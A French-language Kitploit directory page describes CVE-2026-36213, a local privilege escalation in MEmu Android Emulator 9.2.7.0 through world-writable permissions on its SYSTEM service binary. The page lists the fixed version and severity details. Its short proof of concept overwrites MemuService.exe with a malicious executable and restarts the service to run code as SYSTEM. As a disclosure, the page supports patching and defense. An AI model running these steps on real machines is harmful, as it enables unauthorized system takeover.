Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-36213 — CVE-2026-36213 | Élévation de privilèges locale dans MEmu Android Emulator 9.2.7.0 via des permissions non sécurisées sur le binaire de service | Corrigé dans 9.3.2 | Kitploit
Outils/GitHubGitHub/sec-zone/cve-2026-36213
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | Élévation de privilèges locale dans MEmu Android Emulator 9.2.7.0 via des permissions non sécurisées sur le binaire de service | Corrigé dans 9.3.2

Voir le dépôt
51il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-36213

CVE-2026-36213 | Élévation de privilèges locale dans MEmu Android Emulator 9.2.7.0 via des autorisations non sécurisées sur le binaire du service | Corrigé dans 9.3.2

CVE-2026-36213 — Élévation de privilèges locale (LPE) dans MEmu Android Emulator 9.2.7.0

CVE CVSS Status Platform

Résumé

Une vulnérabilité d'élévation de privilèges locale (LPE) dans MEmu Android Emulator 9.2.7.0.
Le service MEmuSVC s'exécute en tant que NT AUTHORITY\SYSTEM tandis que son binaire est modifiable par tout utilisateur local, ce qui permet une compromission totale du système.


Vulnérabilité

MEmuService.exe est installé en tant que service Windows de niveau SYSTEM avec des autorisations NTFS non sécurisées :

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binar

Preuve de concept

:: Étape 1 - Vérifier les autorisations vulnérables

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: Étape 2 - Remplacer le binaire (en tant qu'utilisateur à faibles privilèges)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: Étape 3 - Redémarrer le service

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: Résultat : malicious.exe s'exécute en tant que NT AUTHORITY\SYSTEM

Script de détection

Disponible à l'adresse : https://github.com/sec-zone/Hijack-service-binaries

Avertissement

Cette recherche a été menée à des fins éducatives dans le cadre d'une politique de divulgation responsable.
L'auteur n'est pas responsable de toute mauvaise utilisation de ces informations.

Chercheur

Nom : Mohammad Hossein Ashofte Yazdi
Linkedin : https://www.linkedin.com/in/seczone64
Twitter : @sec_zone64
Email : [email protected]

Télécharger l’outil
ChampDétails
CVECVE-2026-36213
ProduitMEmu Android Emulator (MicroVirt)
Version affectée9.2.7.0 et versions antérieures
Version corrigée9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010